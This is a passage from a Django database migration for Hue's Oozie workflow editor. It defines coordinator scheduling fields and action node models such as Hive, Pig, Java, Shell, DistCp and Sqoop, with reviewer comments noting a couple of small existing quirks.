(b'Asia/Vladivostok', b'Asia/Vladivostok'), (b'Asia/Yakutsk', b'Asia/Yakutsk'), (b'Asia/Yekaterinburg', b'Asia/Yekaterinburg'), (b'Asia/Yerevan', b'Asia/Yerevan'), (b'Atlantic/Azores', b'Atlantic/Azores'), (b'Atlantic/Bermuda', b'Atlantic/Bermuda'), (b'Atlantic/Canary', b'Atlantic/Canary'), (b'Atlantic/Cape_Verde', b'Atlantic/Cape_Verde'), (b'Atlantic/Faeroe', b'Atlantic/Faeroe'), (b'Atlantic/Faroe', b'Atlantic/Faroe'), (b'Atlantic/Jan_Mayen', b'Atlantic/Jan_Mayen'), (b'Atlantic/Madeira', b'Atlantic/Madeira'), (b'Atlantic/Reykjavik', b'Atlantic/Reykjavik'), (b'Atlantic/South_Georgia', b'Atlantic/South_Georgia'), (b'Atlantic/St_Helena', b'Atlantic/St_Helena'), (b'Atlantic/Stanley', b'Atlantic/Stanley'), (b'Australia/ACT', b'Australia/ACT'), (b'Australia/Adelaide', b'Australia/Adelaide'), (b'Australia/Brisbane', b'Australia/Brisbane'), (b'Australia/Broken_Hill', b'Australia/Broken_Hill'), (b'Australia/Canberra', b'Australia/Canberra'), (b'Australia/Currie', b'Australia/Currie'), (b'Australia/Darwin', b'Australia/Darwin'), (b'Australia/Eucla', b'Australia/Eucla'), (b'Australia/Hobart', b'Australia/Hobart'), (b'Australia/LHI', b'Australia/LHI'), (b'Australia/Lindeman', b'Australia/Lindeman'), (b'Australia/Lord_Howe', b'Australia/Lord_Howe'), (b'Australia/Melbourne', b'Australia/Melbourne'), (b'Australia/NSW', b'Australia/NSW'), (b'Australia/North', b'Australia/North'), (b'Australia/Perth', b'Australia/Perth'), (b'Australia/Queensland', b'Australia/Queensland'), (b'Australia/South', b'Australia/South'), (b'Australia/Sydney', b'Australia/Sydney'), (b'Australia/Tasmania', b'Australia/Tasmania'), (b'Australia/Victoria', b'Australia/Victoria'), (b'Australia/West', b'Australia/West'), (b'Australia/Yancowinna', b'Australia/Yancowinna'), (b'Brazil/Acre', b'Brazil/Acre'), (b'Brazil/DeNoronha', b'Brazil/DeNoronha'), (b'Brazil/East', b'Brazil/East'), (b'Brazil/West', b'Brazil/West'), (b'CET', b'CET'), (b'CST6CDT', b'CST6CDT'), (b'Canada/Atlantic', b'Canada/Atlantic'), 
(b'Canada/Central', b'Canada/Central'), (b'Canada/East-Saskatchewan', b'Canada/East-Saskatchewan'), (b'Canada/Eastern', b'Canada/Eastern'), (b'Canada/Mountain', b'Canada/Mountain'), (b'Canada/Newfoundland', b'Canada/Newfoundland'), (b'Canada/Pacific', b'Canada/Pacific'), (b'Canada/Saskatchewan', b'Canada/Saskatchewan'), (b'Canada/Yukon', b'Canada/Yukon'), (b'Chile/Continental', b'Chile/Continental'), (b'Chile/EasterIsland', b'Chile/EasterIsland'), (b'Cuba', b'Cuba'), (b'EET', b'EET'), (b'EST', b'EST'), (b'EST5EDT', b'EST5EDT'), (b'Egypt', b'Egypt'), (b'Eire', b'Eire'), (b'Etc/GMT', b'Etc/GMT'), (b'Etc/GMT+0', b'Etc/GMT+0'), (b'Etc/GMT+1', b'Etc/GMT+1'), (b'Etc/GMT+10', b'Etc/GMT+10'), (b'Etc/GMT+11', b'Etc/GMT+11'), (b'Etc/GMT+12', b'Etc/GMT+12'), (b'Etc/GMT+2', b'Etc/GMT+2'), (b'Etc/GMT+3', b'Etc/GMT+3'), (b'Etc/GMT+4', b'Etc/GMT+4'), (b'Etc/GMT+5', b'Etc/GMT+5'), (b'Etc/GMT+6', b'Etc/GMT+6'), (b'Etc/GMT+7', b'Etc/GMT+7'), (b'Etc/GMT+8', b'Etc/GMT+8'), (b'Etc/GMT+9', b'Etc/GMT+9'), (b'Etc/GMT-0', b'Etc/GMT-0'), (b'Etc/GMT-1', b'Etc/GMT-1'), (b'Etc/GMT-10', b'Etc/GMT-10'), (b'Etc/GMT-11', b'Etc/GMT-11'), (b'Etc/GMT-12', b'Etc/GMT-12'), (b'Etc/GMT-13', b'Etc/GMT-13'), (b'Etc/GMT-14', b'Etc/GMT-14'), (b'Etc/GMT-2', b'Etc/GMT-2'), (b'Etc/GMT-3', b'Etc/GMT-3'), (b'Etc/GMT-4', b'Etc/GMT-4'), (b'Etc/GMT-5', b'Etc/GMT-5'), (b'Etc/GMT-6', b'Etc/GMT-6'), (b'Etc/GMT-7', b'Etc/GMT-7'), (b'Etc/GMT-8', b'Etc/GMT-8'), (b'Etc/GMT-9', b'Etc/GMT-9'), (b'Etc/GMT0', b'Etc/GMT0'), (b'Etc/Greenwich', b'Etc/Greenwich'), (b'Etc/UCT', b'Etc/UCT'), (b'Etc/UTC', b'Etc/UTC'), (b'Etc/Universal', b'Etc/Universal'), (b'Etc/Zulu', b'Etc/Zulu'), (b'Europe/Amsterdam', b'Europe/Amsterdam'), (b'Europe/Andorra', b'Europe/Andorra'), (b'Europe/Athens', b'Europe/Athens'), (b'Europe/Belfast', b'Europe/Belfast'), (b'Europe/Belgrade', b'Europe/Belgrade'), (b'Europe/Berlin', b'Europe/Berlin'), (b'Europe/Bratislava', b'Europe/Bratislava'), (b'Europe/Brussels', b'Europe/Brussels'), (b'Europe/Bucharest', 
b'Europe/Bucharest'), (b'Europe/Budapest', b'Europe/Budapest'), (b'Europe/Chisinau', b'Europe/Chisinau'), (b'Europe/Copenhagen', b'Europe/Copenhagen'), (b'Europe/Dublin', b'Europe/Dublin'), (b'Europe/Gibraltar', b'Europe/Gibraltar'), (b'Europe/Guernsey', b'Europe/Guernsey'), (b'Europe/Helsinki', b'Europe/Helsinki'), (b'Europe/Isle_of_Man', b'Europe/Isle_of_Man'), (b'Europe/Istanbul', b'Europe/Istanbul'), (b'Europe/Jersey', b'Europe/Jersey'), (b'Europe/Kaliningrad', b'Europe/Kaliningrad'), (b'Europe/Kiev', b'Europe/Kiev'), (b'Europe/Lisbon', b'Europe/Lisbon'), (b'Europe/Ljubljana', b'Europe/Ljubljana'), (b'Europe/London', b'Europe/London'), (b'Europe/Luxembourg', b'Europe/Luxembourg'), (b'Europe/Madrid', b'Europe/Madrid'), (b'Europe/Malta', b'Europe/Malta'), (b'Europe/Mariehamn', b'Europe/Mariehamn'), (b'Europe/Minsk', b'Europe/Minsk'), (b'Europe/Monaco', b'Europe/Monaco'), (b'Europe/Moscow', b'Europe/Moscow'), (b'Europe/Nicosia', b'Europe/Nicosia'), (b'Europe/Oslo', b'Europe/Oslo'), (b'Europe/Paris', b'Europe/Paris'), (b'Europe/Podgorica', b'Europe/Podgorica'), (b'Europe/Prague', b'Europe/Prague'), (b'Europe/Riga', b'Europe/Riga'), (b'Europe/Rome', b'Europe/Rome'), (b'Europe/Samara', b'Europe/Samara'), (b'Europe/San_Marino', b'Europe/San_Marino'), (b'Europe/Sarajevo', b'Europe/Sarajevo'), (b'Europe/Simferopol', b'Europe/Simferopol'), (b'Europe/Skopje', b'Europe/Skopje'), (b'Europe/Sofia', b'Europe/Sofia'), (b'Europe/Stockholm', b'Europe/Stockholm'), (b'Europe/Tallinn', b'Europe/Tallinn'), (b'Europe/Tirane', b'Europe/Tirane'), (b'Europe/Tiraspol', b'Europe/Tiraspol'), (b'Europe/Uzhgorod', b'Europe/Uzhgorod'), (b'Europe/Vaduz', b'Europe/Vaduz'), (b'Europe/Vatican', b'Europe/Vatican'), (b'Europe/Vienna', b'Europe/Vienna'), (b'Europe/Vilnius', b'Europe/Vilnius'), (b'Europe/Volgograd', b'Europe/Volgograd'), (b'Europe/Warsaw', b'Europe/Warsaw'), (b'Europe/Zagreb', b'Europe/Zagreb'), (b'Europe/Zaporozhye', b'Europe/Zaporozhye'), (b'Europe/Zurich', b'Europe/Zurich'), 
(b'Factory', b'Factory'), (b'GB', b'GB'), (b'GB-Eire', b'GB-Eire'), (b'GMT', b'GMT'), (b'GMT+0', b'GMT+0'), (b'GMT+1', b'GMT+1'), (b'GMT+10', b'GMT+10'), (b'GMT+11', b'GMT+11'), (b'GMT+12', b'GMT+12'), (b'GMT+13', b'GMT+13'), (b'GMT+14', b'GMT+14'), (b'GMT+2', b'GMT+2'), (b'GMT+3', b'GMT+3'), (b'GMT+4', b'GMT+4'), (b'GMT+5', b'GMT+5'), (b'GMT+6', b'GMT+6'), (b'GMT+7', b'GMT+7'), (b'GMT+8', b'GMT+8'), (b'GMT+9', b'GMT+9'), (b'GMT-0', b'GMT-0'), (b'GMT-1', b'GMT-1'), (b'GMT-10', b'GMT-10'), (b'GMT-11', b'GMT-11'), (b'GMT-12', b'GMT-12'), (b'GMT-2', b'GMT-2'), (b'GMT-3', b'GMT-3'), (b'GMT-4', b'GMT-4'), (b'GMT-5', b'GMT-5'), (b'GMT-6', b'GMT-6'), (b'GMT-7', b'GMT-7'), (b'GMT-8', b'GMT-8'), (b'GMT-9', b'GMT-9'), (b'GMT0', b'GMT0'), (b'Greenwich', b'Greenwich'), (b'HST', b'HST'), (b'Hongkong', b'Hongkong'), (b'Iceland', b'Iceland'), (b'Indian/Antananarivo', b'Indian/Antananarivo'), (b'Indian/Chagos', b'Indian/Chagos'), (b'Indian/Christmas', b'Indian/Christmas'), (b'Indian/Cocos', b'Indian/Cocos'), (b'Indian/Comoro', b'Indian/Comoro'), (b'Indian/Kerguelen', b'Indian/Kerguelen'), (b'Indian/Mahe', b'Indian/Mahe'), (b'Indian/Maldives', b'Indian/Maldives'), (b'Indian/Mauritius', b'Indian/Mauritius'), (b'Indian/Mayotte', b'Indian/Mayotte'), (b'Indian/Reunion', b'Indian/Reunion'), (b'Iran', b'Iran'), (b'Israel', b'Israel'), (b'Jamaica', b'Jamaica'), (b'Japan', b'Japan'), (b'Kwajalein', b'Kwajalein'), (b'Libya', b'Libya'), (b'MET', b'MET'), (b'MST', b'MST'), (b'MST7MDT', b'MST7MDT'), (b'Mexico/BajaNorte', b'Mexico/BajaNorte'), (b'Mexico/BajaSur', b'Mexico/BajaSur'), (b'Mexico/General', b'Mexico/General'), (b'Mideast/Riyadh87', b'Mideast/Riyadh87'), (b'Mideast/Riyadh88', b'Mideast/Riyadh88'), (b'Mideast/Riyadh89', b'Mideast/Riyadh89'), (b'NZ', b'NZ'), (b'NZ-CHAT', b'NZ-CHAT'), (b'Navajo', b'Navajo'), (b'PRC', b'PRC'), (b'PST8PDT', b'PST8PDT'), (b'Pacific/Apia', b'Pacific/Apia'), (b'Pacific/Auckland', b'Pacific/Auckland'), (b'Pacific/Chatham', b'Pacific/Chatham'), 
(b'Pacific/Chuuk', b'Pacific/Chuuk'), (b'Pacific/Easter', b'Pacific/Easter'), (b'Pacific/Efate', b'Pacific/Efate'), (b'Pacific/Enderbury', b'Pacific/Enderbury'), (b'Pacific/Fakaofo', b'Pacific/Fakaofo'), (b'Pacific/Fiji', b'Pacific/Fiji'), (b'Pacific/Funafuti', b'Pacific/Funafuti'), (b'Pacific/Galapagos', b'Pacific/Galapagos'), (b'Pacific/Gambier', b'Pacific/Gambier'), (b'Pacific/Guadalcanal', b'Pacific/Guadalcanal'), (b'Pacific/Guam', b'Pacific/Guam'), (b'Pacific/Honolulu', b'Pacific/Honolulu'), (b'Pacific/Johnston', b'Pacific/Johnston'), (b'Pacific/Kiritimati', b'Pacific/Kiritimati'), (b'Pacific/Kosrae', b'Pacific/Kosrae'), (b'Pacific/Kwajalein', b'Pacific/Kwajalein'), (b'Pacific/Majuro', b'Pacific/Majuro'), (b'Pacific/Marquesas', b'Pacific/Marquesas'), (b'Pacific/Midway', b'Pacific/Midway'), (b'Pacific/Nauru', b'Pacific/Nauru'), (b'Pacific/Niue', b'Pacific/Niue'), (b'Pacific/Norfolk', b'Pacific/Norfolk'), (b'Pacific/Noumea', b'Pacific/Noumea'), (b'Pacific/Pago_Pago', b'Pacific/Pago_Pago'), (b'Pacific/Palau', b'Pacific/Palau'), (b'Pacific/Pitcairn', b'Pacific/Pitcairn'), (b'Pacific/Pohnpei', b'Pacific/Pohnpei'), (b'Pacific/Ponape', b'Pacific/Ponape'), (b'Pacific/Port_Moresby', b'Pacific/Port_Moresby'), (b'Pacific/Rarotonga', b'Pacific/Rarotonga'), (b'Pacific/Saipan', b'Pacific/Saipan'), (b'Pacific/Samoa', b'Pacific/Samoa'), (b'Pacific/Tahiti', b'Pacific/Tahiti'), (b'Pacific/Tarawa', b'Pacific/Tarawa'), (b'Pacific/Tongatapu', b'Pacific/Tongatapu'), (b'Pacific/Truk', b'Pacific/Truk'), (b'Pacific/Wake', b'Pacific/Wake'), (b'Pacific/Wallis', b'Pacific/Wallis'), (b'Pacific/Yap', b'Pacific/Yap'), (b'Poland', b'Poland'), (b'Portugal', b'Portugal'), (b'ROC', b'ROC'), (b'ROK', b'ROK'), (b'Singapore', b'Singapore'), (b'Turkey', b'Turkey'), (b'UCT', b'UCT'), (b'US/Alaska', b'US/Alaska'), (b'US/Aleutian', b'US/Aleutian'), (b'US/Arizona', b'US/Arizona'), (b'US/Central', b'US/Central'), (b'US/East-Indiana', b'US/East-Indiana'), (b'US/Eastern', b'US/Eastern'), (b'US/Hawaii', 
b'US/Hawaii'), (b'US/Indiana-Starke', b'US/Indiana-Starke'), (b'US/Michigan', b'US/Michigan'), (b'US/Mountain', b'US/Mountain'), (b'US/Pacific', b'US/Pacific'), (b'US/Pacific-New', b'US/Pacific-New'), (b'US/Samoa', b'US/Samoa'), (b'Universal', b'Universal'), (b'W-SU', b'W-SU'), (b'WET', b'WET'), (b'Zulu', b'Zulu')], default=b'America/Los_Angeles', help_text='The timezone of the coordinator. Only used for managing the daylight saving time changes when combining several coordinators.', max_length=24, verbose_name='Timezone')),
# NOTE(review): auto_now=True on 'start' and 'end' means Django rewrites
# them on every save, contradicting their "When to start the first/last
# workflow" help texts. This reflects the model at generation time; do not
# alter a historical migration — any fix belongs in a new migration.
('start', models.DateTimeField(auto_now=True, help_text='When to start the first workflow.', verbose_name='Start')),
('end', models.DateTimeField(auto_now=True, help_text='When to start the last workflow.', verbose_name='End')),
('timeout', models.SmallIntegerField(blank=True, help_text='Number of minutes the coordinator action will be in WAITING or READY status before giving up on its execution.', null=True, verbose_name='Timeout')),
# concurrency/throttle: optional 1..60 limits on simultaneously RUNNING /
# WAITING coordinator actions respectively.
('concurrency', models.PositiveSmallIntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10), (11, 11), (12, 12), (13, 13), (14, 14), (15, 15), (16, 16), (17, 17), (18, 18), (19, 19), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27), (28, 28), (29, 29), (30, 30), (31, 31), (32, 32), (33, 33), (34, 34), (35, 35), (36, 36), (37, 37), (38, 38), (39, 39), (40, 40), (41, 41), (42, 42), (43, 43), (44, 44), (45, 45), (46, 46), (47, 47), (48, 48), (49, 49), (50, 50), (51, 51), (52, 52), (53, 53), (54, 54), (55, 55), (56, 56), (57, 57), (58, 58), (59, 59), (60, 60)], help_text='The number of coordinator actions that are allowed to run concurrently (RUNNING status) before the coordinator engine starts throttling them.', null=True, verbose_name='Concurrency')),
('execution', models.CharField(blank=True, choices=[(b'FIFO', 'FIFO (oldest first) default'), (b'LIFO', 'LIFO (newest first)'), (b'LAST_ONLY', 'LAST_ONLY (discards all older materializations)')], help_text="Execution strategy of its coordinator actions when there is backlog of coordinator actions in the coordinator engine. The different execution strategies are 'oldest first', 'newest first' and 'last one only'. A backlog normally happens because of delayed input data, concurrency control or because manual re-runs of coordinator jobs.", max_length=10, null=True, verbose_name='Execution')),
('throttle', models.PositiveSmallIntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10), (11, 11), (12, 12), (13, 13), (14, 14), (15, 15), (16, 16), (17, 17), (18, 18), (19, 19), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27), (28, 28), (29, 29), (30, 30), (31, 31), (32, 32), (33, 33), (34, 34), (35, 35), (36, 36), (37, 37), (38, 38), (39, 39), (40, 40), (41, 41), (42, 42), (43, 43), (44, 44), (45, 45), (46, 46), (47, 47), (48, 48), (49, 49), (50, 50), (51, 51), (52, 52), (53, 53), (54, 54), (55, 55), (56, 56), (57, 57), (58, 58), (59, 59), (60, 60)], help_text='The materialization or creation throttle value for its coordinator actions. Number of maximum coordinator actions that are allowed to be in WAITING state concurrently.', null=True, verbose_name='Throttle')),
('job_properties', models.TextField(default=b'[]', help_text='Additional properties to transmit to the workflow, e.g. limit=100, and EL functions, e.g. username=${coord:user()}', verbose_name='Workflow properties')),
],
bases=('oozie.job',),
),
# Decision: control node (no extra columns beyond the Node parent link);
# multi-table child of Node.
migrations.CreateModel(
name='Decision',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
# DecisionEnd: control node closing a Decision branch; no extra columns,
# multi-table child of Node.
migrations.CreateModel(
name='DecisionEnd',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
# DistCp: Hadoop distributed-copy action node; multi-table child of Node.
# params/job_properties/prepares are JSON-encoded lists stored as text
# (default b'[]').
migrations.CreateModel(
name='DistCp',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('params', models.TextField(default=b'[]', help_text='The arguments of the Distcp command. Put options first, then source paths, then destination path.', verbose_name='Arguments')),
# NOTE(review): help_text is missing its closing parenthesis after
# "mapred.job.queue.name=production" — cosmetic only; left as-is since
# editing a historical migration is not worthwhile.
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete then to create before starting the application. This should be used exclusively for directory cleanup', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
# Email: notification action node; multi-table child of Node. 'to'/'cc'
# hold comma-separated address lists; subject/body are plain text.
migrations.CreateModel(
name='Email',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('to', models.TextField(default=b'', help_text='Comma-separated values.', verbose_name='TO addresses')),
('cc', models.TextField(blank=True, default=b'', help_text='Comma-separated values.', verbose_name='CC addresses (optional)')),
('subject', models.TextField(default=b'', help_text='Plain-text.', verbose_name='Subject')),
('body', models.TextField(default=b'', help_text='Plain-text.', verbose_name='Body')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
# End: terminal control node of a workflow; no extra columns, multi-table
# child of Node.
migrations.CreateModel(
name='End',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
# Fork: control node splitting the flow into parallel branches; no extra
# columns, multi-table child of Node.
migrations.CreateModel(
name='Fork',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Fs',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('deletes', models.TextField(blank=True, default=b'[]', help_text='Delete the specified path, if it is a directory it deletes recursively all its content and then deletes the directory.', verbose_name='Delete path')),
('mkdirs', models.TextField(blank=True, default=b'[]', help_text='Create the specified directory, it creates all missing directories in the path. If the directory already exist it does a no-op.', verbose_name='Create directory')),
('moves', models.TextField(blank=True, default=b'[]', help_text='Move a file or directory to another path.', verbose_name='Move file')),
('chmods', models.TextField(blank=True, default=b'[]', help_text='Change the permissions for the specified path. Permissions can be specified using the Unix Symbolic representation (e.g. -rwxrw-rw-) or an octal representation (755).', verbose_name='Change permissions')),
('touchzs', models.TextField(blank=True, default=b'[]', help_text='Creates a zero length file in the specified path if none exists or touch it.', verbose_name='Create or touch a file')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Generic',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('xml', models.TextField(default=b'', help_text='This will be inserted verbatim in the action <action name="email">...</action>. E.g. all the XML content like <email><cc>hue@hue.org</cc></email> will be inserted into the action and produce <action name="email"><email><cc>hue@hue.org</cc></email><ok/><error/></action>', verbose_name='XML of the custom action')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Hive',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('script_path', models.CharField(help_text='Script name or path to the Hive script. E.g. my_script.sql.', max_length=256, verbose_name='Script name')),
('params', models.TextField(default=b'[]', help_text='The Hive parameters of the script. E.g. N=5, INPUT=${inputDir}', verbose_name='Parameters')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete, then create, before starting the application. This should be used exclusively for directory cleanup.', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'hive-config.xml', help_text='Refer to a Hive hive-config.xml file bundled in the workflow deployment directory. Pick a name different than hive-site.xml.', max_length=512, verbose_name='Job XML')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Java',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('jar_path', models.CharField(help_text='Name or path to the Java jar file on HDFS. E.g. examples.jar.', max_length=512, verbose_name='Jar name')),
('main_class', models.CharField(help_text='Full name of the Java class. E.g. org.apache.hadoop.examples.Grep', max_length=256, verbose_name='Main class')),
('args', models.TextField(blank=True, help_text='Arguments of the main method. The value of each arg element is considered a single argument and they are passed to the main method in the same order.', verbose_name='Arguments')),
('java_opts', models.CharField(blank=True, help_text='Command-line parameters used to start the JVM that will execute the Java application. Using this element is equivalent to using the mapred.child.java.opts configuration property. E.g. -Dexample-property=hue', max_length=256, verbose_name='Java options')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete and then to create before starting the application. This should be used exclusively for directory cleanup.', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
('capture_output', models.BooleanField(default=False, help_text='Capture output of the stdout of the Java command execution. The Java command output must be in Java Properties file format and it must not exceed 2KB. From within the workflow definition, the output of an Java action node is accessible via the String action:output(String node, String key) function', verbose_name='Capture output')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Join',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Kill',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('message', models.CharField(default=b'Action failed, error message[${wf:errorMessage(wf:lastErrorNode())}]', max_length=256)),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Mapreduce',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('jar_path', models.CharField(help_text='Name or path to the MapReduce jar file on HDFS. E.g. examples.jar.', max_length=512, verbose_name='Jar name')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete and then to create before starting the application. This should be used exclusively for directory cleanup.', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Pig',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('script_path', models.CharField(help_text='Script name or path to the Pig script. E.g. my_script.pig.', max_length=256, verbose_name='Script name')),
('params', models.TextField(default=b'[]', help_text='The Pig parameters of the script. e.g. "-param", "INPUT=${inputDir}"', verbose_name='Parameters')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete and then to create before starting the application. This should be used exclusively for directory cleanup.', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Shell',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('command', models.CharField(help_text='The path of the Shell command to execute.', max_length=256, verbose_name='Shell command')),
('params', models.TextField(default=b'[]', help_text='The arguments of Shell command can then be specified using one or more argument element.', verbose_name='Arguments')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete then to create before starting the application. This should be used exclusively for directory cleanup', verbose_name='Prepares')),
('job_xml', models.CharField(blank=True, default=b'', help_text='Refer to a Hadoop JobConf job.xml file bundled in the workflow deployment directory. Properties specified in the Job Properties element override properties specified in the files specified in the Job XML element.', max_length=512, verbose_name='Job XML')),
('capture_output', models.BooleanField(default=False, help_text='Capture output of the stdout of the Shell command execution. The Shell command output must be in Java Properties file format and it must not exceed 2KB. From within the workflow definition, the output of an Shell action node is accessible via the String action:output(String node, String key) function', verbose_name='Capture output')),
],
options={
'abstract': False,
},
bases=('oozie.node',),
),
migrations.CreateModel(
name='Sqoop',
fields=[
('node_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Node')),
('script_path', models.TextField(blank=True, default=b'', help_text='The full Sqoop command. Either put it here or split it by spaces and insert the parts as multiple parameters below.', verbose_name='Command')),
('params', models.TextField(default=b'[]', help_text='If no command is specified, split the command by spaces and insert the Sqoop parameters here e.g. import, --connect, jdbc:hsqldb:file:db.hsqldb, ...', verbose_name='Parameters')),
('files', models.TextField(default=b'[]', help_text='List of names or paths of files to be added to the distributed cache and the task running directory.', verbose_name='Files')),
('archives', models.TextField(default=b'[]', help_text='List of names or paths of the archives to be added to the distributed cache.', verbose_name='Archives')),
('job_properties', models.TextField(default=b'[]', help_text='For the job configuration (e.g. mapred.job.queue.name=production)', verbose_name='Hadoop job properties')),
('prepares', models.TextField(default=b'[]', help_text='List of absolute paths to delete then to create before starting the application. This should be used exclusively for directory cleanup', verbose_name='Prepares')),
